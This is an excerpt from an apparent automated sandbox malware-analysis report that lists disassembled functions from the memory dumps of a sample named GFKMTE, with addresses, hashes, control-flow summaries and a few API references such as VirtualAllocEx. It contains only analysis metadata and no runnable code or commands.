                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 19bdce1b4b2766f697bc4c51748fc023ac9955d449ea3ee75434c96d4f99592f
                                                                                                                                                  • Instruction ID: 428d589c5a929df4144b7bae23eab8494b7f5d01c2eed4edc600b1ab91a0ae87
                                                                                                                                                  • Opcode Fuzzy Hash: 19bdce1b4b2766f697bc4c51748fc023ac9955d449ea3ee75434c96d4f99592f
                                                                                                                                                  • Instruction Fuzzy Hash: 2742CE74E01229CFDB64DFA9C984B9DBBB6FF48300F1485A9D819AB355D730AA81CF50
                                                                                                                                                  Function 0298BDD8 Relevance: .5, Instructions: 510COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 7d8aba22561cb736f88c325f07e6b26be72fc2aac3825fddfb3da88db4b606ef
                                                                                                                                                  • Instruction ID: e09941960213fa153df351a50fa443ba2c9cddf56a4a51fec20640657efb0f3e
                                                                                                                                                  • Opcode Fuzzy Hash: 7d8aba22561cb736f88c325f07e6b26be72fc2aac3825fddfb3da88db4b606ef
                                                                                                                                                  • Instruction Fuzzy Hash: C7427E74E01219CFDB68DFA9C984B9DBBB2BF48300F1485A9E909A7355D730AE81CF50
                                                                                                                                                  Function 02983651 Relevance: .5, Instructions: 492COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 08d899e24fefcc4bc0f80ea3617da37644aae4020362db3befdc1ce05dbaa9d5
                                                                                                                                                  • Instruction ID: 2a699664f9330a51a3083ad5f077525a7635c34f834c00232a6de3542ce28ab6
                                                                                                                                                  • Opcode Fuzzy Hash: 08d899e24fefcc4bc0f80ea3617da37644aae4020362db3befdc1ce05dbaa9d5
                                                                                                                                                  • Instruction Fuzzy Hash: DD32B3B4900219CFEB50EF69C584A8EFBB6BF48711F59C199D448AB211DB30DD85CFA8
                                                                                                                                                  Function 0298D89A Relevance: .5, Instructions: 485COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e62fb86b930eb19398563491c0a5ec2c97896e1fbfb9a2a78b77d70d2768d4a2
                                                                                                                                                  • Instruction ID: 3b4f436fb5562a9802f99d76bb07abc93e9494eee1e70374c1704412719347fe
                                                                                                                                                  • Opcode Fuzzy Hash: e62fb86b930eb19398563491c0a5ec2c97896e1fbfb9a2a78b77d70d2768d4a2
                                                                                                                                                  • Instruction Fuzzy Hash: 8B32B470900219CFEB54EF69C684A8EFBB6BF49311F59C199C448AB251DB30DD85CF64
                                                                                                                                                  Function 02984448 Relevance: .4, Instructions: 424COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: cd0d235aef0fd80e74e23863aaa8679918f4d08f41b3a32c241b01c4c6362cf8
                                                                                                                                                  • Instruction ID: b0ac68a43c9c619222e86cb3f2c76d034baacb2e06254cb0a6697b5e16a38462
                                                                                                                                                  • Opcode Fuzzy Hash: cd0d235aef0fd80e74e23863aaa8679918f4d08f41b3a32c241b01c4c6362cf8
                                                                                                                                                  • Instruction Fuzzy Hash: 0812E6B0A0025A8FEB54DFA9C684A8EFBF6FF48215F19D1A5D0489B251DB30DC85CF54
                                                                                                                                                  Function 02984010 Relevance: .3, Instructions: 319COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a6e07809fb1794865d0851d50b12a9d9ff897292b3ee846bfc5b54ab771992d3
                                                                                                                                                  • Instruction ID: c6eeadca93961c1edeb18b437acb9e5430572aac72933e44cccc291f118e4cab
                                                                                                                                                  • Opcode Fuzzy Hash: a6e07809fb1794865d0851d50b12a9d9ff897292b3ee846bfc5b54ab771992d3
                                                                                                                                                  • Instruction Fuzzy Hash: 3DE1E874E0421A8FDB14DFA9C580AAEFBF2BF89304F249169D419AB355D730AD42CF61
                                                                                                                                                  Function 0298EEE7 Relevance: .2, Instructions: 152COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b043689b42c8ed3496e99748c7c812cae1fc2a131b640c686e470454ecf0a751
                                                                                                                                                  • Instruction ID: 3bee9c05214f161a7c8f7131501d6613c7d532e5c31be1a804fed058a7c69de9
                                                                                                                                                  • Opcode Fuzzy Hash: b043689b42c8ed3496e99748c7c812cae1fc2a131b640c686e470454ecf0a751
                                                                                                                                                  • Instruction Fuzzy Hash: 63619674E01208DFDB54DFAAD594A9DBBF2FF89300F24846AE815AB364DB319941CF50
                                                                                                                                                  Function 0298B248 Relevance: 2.6, Strings: 2, Instructions: 139COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1143 298b248-298b26b 1144 298b26d 1143->1144 1145 298b272-298b331 call 29800e4 call 298b899 1143->1145 1144->1145 1154 298b36e-298b372 1145->1154 1155 298b333-298b36b 1154->1155 1156 298b374-298b3e6 call 29800f4 call 298bdd8 1154->1156 1155->1154 1164 298b3ec-298b3f6 1156->1164
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Teq$Teq
                                                                                                                                                  • API String ID: 0-2938103587
                                                                                                                                                  • Opcode ID: d0ab4be14a29bf9f395bc8b326fb97ae85d47a5b85cd41f09072289113e5da15
                                                                                                                                                  • Instruction ID: 4403224f4b1ba33bcc8f545218c10789a5e1d886d144d6b83ea331b91d3acaa3
                                                                                                                                                  • Opcode Fuzzy Hash: d0ab4be14a29bf9f395bc8b326fb97ae85d47a5b85cd41f09072289113e5da15
                                                                                                                                                  • Instruction Fuzzy Hash: C051B674E012199FDB08DFA9C894AAEFBF2FF88300F14812AE915AB354DB715906CF50
                                                                                                                                                  Function 02981000 Relevance: 2.6, Strings: 2, Instructions: 139COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1093 2981000-2981023 1095 298102a-29810e9 call 29800e4 call 2981651 1093->1095 1096 2981025 1093->1096 1105 2981126-298112a 1095->1105 1096->1095 1106 29810eb-2981123 1105->1106 1107 298112c-298119e call 29800f4 call 2981b91 1105->1107 1106->1105 1115 29811a4-29811ae 1107->1115
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Teq$Teq
                                                                                                                                                  • API String ID: 0-2938103587
                                                                                                                                                  • Opcode ID: 0ff76f7ab18ba34eea797af525a8323bfae634622bca078e32e088b56cdcaed4
                                                                                                                                                  • Instruction ID: afd4f4530fa61eb7db7f77637b3a9966e0e98980b12332bb1a464cae636ad45e
                                                                                                                                                  • Opcode Fuzzy Hash: 0ff76f7ab18ba34eea797af525a8323bfae634622bca078e32e088b56cdcaed4
                                                                                                                                                  • Instruction Fuzzy Hash: A351A574E012189FDB08DFE9D894AAEFBB2FF88300F14812AE915AB354DB755906CF50
                                                                                                                                                  Function 02984CA0 Relevance: 2.6, Strings: 2, Instructions: 139COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1118 2984ca0-2984cc3 1120 2984cca-2984d89 call 29800e4 call 29852f1 1118->1120 1121 2984cc5 1118->1121 1130 2984dc6-2984dca 1120->1130 1121->1120 1131 2984d8b-2984dc3 1130->1131 1132 2984dcc-2984e3e call 29800f4 call 2985c38 1130->1132 1131->1130 1140 2984e44-2984e4e 1132->1140
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Teq$Teq
                                                                                                                                                  • API String ID: 0-2938103587
                                                                                                                                                  • Opcode ID: cd3abaaea2bb828e2e2479a2bd7feb866c5a426a0b2146e0e4195e39632dd13a
                                                                                                                                                  • Instruction ID: 785da645005ef8bade4461209fc68e5f043205749be21e6593ca9b181bd08b6e
                                                                                                                                                  • Opcode Fuzzy Hash: cd3abaaea2bb828e2e2479a2bd7feb866c5a426a0b2146e0e4195e39632dd13a
                                                                                                                                                  • Instruction Fuzzy Hash: 3651A574E002199FDB08DFA9D884AAEFBF2FF88300F14852AE915AB354DB755906CF50
                                                                                                                                                  Function 02984C90 Relevance: 2.6, Strings: 2, Instructions: 130COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1268 2984c90-2984c9e 1269 2984ca0-2984ca1 1268->1269 1270 2984ca2-2984cc3 1268->1270 1269->1270 1271 2984cca-2984d89 call 29800e4 call 29852f1 1270->1271 1272 2984cc5 1270->1272 1281 2984dc6-2984dca 1271->1281 1272->1271 1282 2984d8b-2984dc3 1281->1282 1283 2984dcc-2984e3e call 29800f4 call 2985c38 1281->1283 1282->1281 1291 2984e44-2984e4e 1283->1291
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Teq$Teq
                                                                                                                                                  • API String ID: 0-2938103587
                                                                                                                                                  • Opcode ID: 9a2ea9d08d8277f3c6416fa54e4a0e6659da1b4482fb7972e344efc045847d77
                                                                                                                                                  • Instruction ID: 996b9c1c5f6cfeb3b3d7c2bb4a8cd0d482c7698649edadecaf8b52d4f8fa20d5
                                                                                                                                                  • Opcode Fuzzy Hash: 9a2ea9d08d8277f3c6416fa54e4a0e6659da1b4482fb7972e344efc045847d77
                                                                                                                                                  • Instruction Fuzzy Hash: 0B51C675E002599FDB08DFE9D884AAEFBB2FF88300F14812AE915AB354DB355906CF50
                                                                                                                                                  Function 02980FF3 Relevance: 2.6, Strings: 2, Instructions: 125COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1294 2980ff3-2980ffe 1295 2981000-2981001 1294->1295 1296 2981002-2981023 1294->1296 1295->1296 1297 298102a-29810e9 call 29800e4 call 2981651 1296->1297 1298 2981025 1296->1298 1307 2981126-298112a 1297->1307 1298->1297 1308 29810eb-2981123 1307->1308 1309 298112c-298119e call 29800f4 call 2981b91 1307->1309 1308->1307 1317 29811a4-29811ae 1309->1317
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Teq$Teq
                                                                                                                                                  • API String ID: 0-2938103587
                                                                                                                                                  • Opcode ID: 5978a3a3262a1159febfcbbcb3001b779701c8949c1ea1ad890f02da38441d1f
                                                                                                                                                  • Instruction ID: cd6c7f4081c42a7d7c3742fab34d56191e20f9d2a0bcec5ac35496997e1b4073
                                                                                                                                                  • Opcode Fuzzy Hash: 5978a3a3262a1159febfcbbcb3001b779701c8949c1ea1ad890f02da38441d1f
                                                                                                                                                  • Instruction Fuzzy Hash: D351B675E012589FDB08DFE9D894AAEFBB2FF88300F14812AE915AB354DB715906CF50
                                                                                                                                                  Function 0298B237 Relevance: 2.6, Strings: 2, Instructions: 124COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1320 298b237-298b26b 1322 298b26d 1320->1322 1323 298b272-298b331 call 29800e4 call 298b899 1320->1323 1322->1323 1332 298b36e-298b372 1323->1332 1333 298b333-298b36b 1332->1333 1334 298b374-298b3e6 call 29800f4 call 298bdd8 1332->1334 1333->1332 1342 298b3ec-298b3f6 1334->1342
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Teq$Teq
                                                                                                                                                  • API String ID: 0-2938103587
                                                                                                                                                  • Opcode ID: 5545d2a76b495a15671d8bb39466b46953367020ebb805f771d8b7e03a54ff1f
                                                                                                                                                  • Instruction ID: 612a92e5f4dc2d1b5fbcccdf40057359fd2f0586dc0aa507373d286557f37807
                                                                                                                                                  • Opcode Fuzzy Hash: 5545d2a76b495a15671d8bb39466b46953367020ebb805f771d8b7e03a54ff1f
                                                                                                                                                  • Instruction Fuzzy Hash: 7D51C475E012589FDB08DFE9D894A9EFBB2FF88300F14812AE915AB364DB715906CF50
                                                                                                                                                  Function 0508A300 Relevance: 1.6, APIs: 1, Instructions: 104memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0508A3B2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1529714409.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_5080000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                  • Opcode ID: c54886dd3336b79df2f8579fa84810ff8b6a43c170b92262c393ffb8204b72e9
                                                                                                                                                  • Instruction ID: 62c0ac8414d26ce1256359001b8c04e55adf01d4bf3b92a0434793437f0b6700
                                                                                                                                                  • Opcode Fuzzy Hash: c54886dd3336b79df2f8579fa84810ff8b6a43c170b92262c393ffb8204b72e9
                                                                                                                                                  • Instruction Fuzzy Hash: D731A9B8D002589FCF10DFA9E985ADEFBB1BB49320F10942AE825B7350D735A906CF54
                                                                                                                                                  Function 0508A308 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0508A3B2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1529714409.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_5080000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                  • Opcode ID: bde81fa55e623ee36643606de5a85462331bcedf438d385505c5d8fccb78e5a4
                                                                                                                                                  • Instruction ID: 63279b2baad0350b94865833b93916f10c2db05f9633ce03a05793ad14b4c782
                                                                                                                                                  • Opcode Fuzzy Hash: bde81fa55e623ee36643606de5a85462331bcedf438d385505c5d8fccb78e5a4
                                                                                                                                                  • Instruction Fuzzy Hash: 78319AB8D042589FCF10DFA9D981ADEFBB1BB49320F10942AE915B7350D735A902CF54
                                                                                                                                                  Function 02983D80 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: +
                                                                                                                                                  • API String ID: 0-1750050401
                                                                                                                                                  • Opcode ID: 00003f6bd77e32a9d12617031e0c13816faec4306368d0220198f22cbd00283b
                                                                                                                                                  • Instruction ID: 5d72ac97a8e446977ac5e75fc5ed19220c3921c797bff9129d43c65647f27d25
                                                                                                                                                  • Opcode Fuzzy Hash: 00003f6bd77e32a9d12617031e0c13816faec4306368d0220198f22cbd00283b
                                                                                                                                                  • Instruction Fuzzy Hash: 7D91F674E00218CFDB04DFA9C584A9EBBF2BF88301F198069E815AB365DB349D42CF64
                                                                                                                                                  Function 02983D90 Relevance: 1.4, Strings: 1, Instructions: 197COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: +
                                                                                                                                                  • API String ID: 0-1750050401
                                                                                                                                                  • Opcode ID: 662a2a9ffdb962c5a065e784ebcc9ae10a06ab0f2869f37dd839b61cb5f15f0e
                                                                                                                                                  • Instruction ID: 2fadcfbcca981080c75487d69dd379b4449fad4062ce4ebea7f82fdb82b4c584
                                                                                                                                                  • Opcode Fuzzy Hash: 662a2a9ffdb962c5a065e784ebcc9ae10a06ab0f2869f37dd839b61cb5f15f0e
                                                                                                                                                  • Instruction Fuzzy Hash: 0081C374E00218CFDB04DFA9D584A9EBBF2BF88311F198069E819AB365DB349945CF64
                                                                                                                                                  Function 029863F0 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: r
                                                                                                                                                  • API String ID: 0-1812594589
                                                                                                                                                  • Opcode ID: 82f7c1332d3499530c9d7b0802f81d9024830a419022a548c6cb9626e098827c
                                                                                                                                                  • Instruction ID: 1c535a52e2988ec9d96aff3258ecfa68a3283e0b074ebbc2a1227c42d2255ae0
                                                                                                                                                  • Opcode Fuzzy Hash: 82f7c1332d3499530c9d7b0802f81d9024830a419022a548c6cb9626e098827c
                                                                                                                                                  • Instruction Fuzzy Hash: 1861D474A04206DFC744DFA9C5848AEFBBAFF48301B65C594D915AB359C731EA81CF90
                                                                                                                                                  Function 02982348 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: r
                                                                                                                                                  • API String ID: 0-1812594589
                                                                                                                                                  • Opcode ID: 82243bb770d41818d6c84ccfe79089b61c5836bdb8b040f5bbe4b8b0fea678a7
                                                                                                                                                  • Instruction ID: bfbf3651276f2779e56465f52f748601e932a0b1c45b773b80cf5909d3521ea1
                                                                                                                                                  • Opcode Fuzzy Hash: 82243bb770d41818d6c84ccfe79089b61c5836bdb8b040f5bbe4b8b0fea678a7
                                                                                                                                                  • Instruction Fuzzy Hash: D061E274E0424ADFC708DFA9C5948AEFBB6FF88300B65C595D9159B355C730EA82CBA0
                                                                                                                                                  Function 0298C590 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: r
                                                                                                                                                  • API String ID: 0-1812594589
                                                                                                                                                  • Opcode ID: 183c67e0804700eb899e13860c5d7f2d96ded72cae3a1072f2f97a3392237b90
                                                                                                                                                  • Instruction ID: 946b80d1b84e8118590cc8193960a54ab81e8e2e969ea13b22afb4fc1b4a8b1b
                                                                                                                                                  • Opcode Fuzzy Hash: 183c67e0804700eb899e13860c5d7f2d96ded72cae3a1072f2f97a3392237b90
                                                                                                                                                  • Instruction Fuzzy Hash: 7261F3B490020ADFC748DFA8C5848AEFBB6FF48300B65D5A5D915AB355C730EA91CFA0
                                                                                                                                                  Function 0298E730 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 3/^
                                                                                                                                                  • API String ID: 0-2478644769
                                                                                                                                                  • Opcode ID: 803964109812717be5d2db91e9c357c311b6e99252f5bf12559be923d4a63651
                                                                                                                                                  • Instruction ID: 5fda8720b21cb739258f31ae43105f618211d4ac26a59eac53ec98d9914725a3
                                                                                                                                                  • Opcode Fuzzy Hash: 803964109812717be5d2db91e9c357c311b6e99252f5bf12559be923d4a63651
                                                                                                                                                  • Instruction Fuzzy Hash: 9051F574E002198FDB14DFA9C5906AEFBF6BF89304F248169D458AB355D7319941CFA0
                                                                                                                                                  Function 02982338 Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: r
                                                                                                                                                  • API String ID: 0-1812594589
                                                                                                                                                  • Opcode ID: 8d8b42800aa2e0b447543868d7d5d0fc9a2a887e36d87551717f7f19f9d4265c
                                                                                                                                                  • Instruction ID: 5c13355750d9634b59e67cfbe1af31bcc1a7f051412fbb1d987b6d61dad01e6a
                                                                                                                                                  • Opcode Fuzzy Hash: 8d8b42800aa2e0b447543868d7d5d0fc9a2a887e36d87551717f7f19f9d4265c
                                                                                                                                                  • Instruction Fuzzy Hash: E231AE70D09349DFCB48DFAAC5544AEBBB6FF89300B1888AAD90597321D7309941CF50
                                                                                                                                                  Function 029863E0 Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: r
                                                                                                                                                  • API String ID: 0-1812594589
                                                                                                                                                  • Opcode ID: b164c97bbe77458108b4ecab62ed2a6817e7156f2caaf0c551efb5577eaab347
                                                                                                                                                  • Instruction ID: 1bce6a2bad3827c78a6b6195f255f9f56041c8c11484a3d31bb09cae5f9cf863
                                                                                                                                                  • Opcode Fuzzy Hash: b164c97bbe77458108b4ecab62ed2a6817e7156f2caaf0c551efb5577eaab347
                                                                                                                                                  • Instruction Fuzzy Hash: 29318BB0D09209DFCB48DFAAC5448AEBBFAFF89301B14C4A9D615AB325C7319A01CF50
                                                                                                                                                  Function 0298C581 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: r
                                                                                                                                                  • API String ID: 0-1812594589
                                                                                                                                                  • Opcode ID: 178f69b859bb5f168a2c71e54a657f2412a008b05c5d0c1b2719247dc73636d8
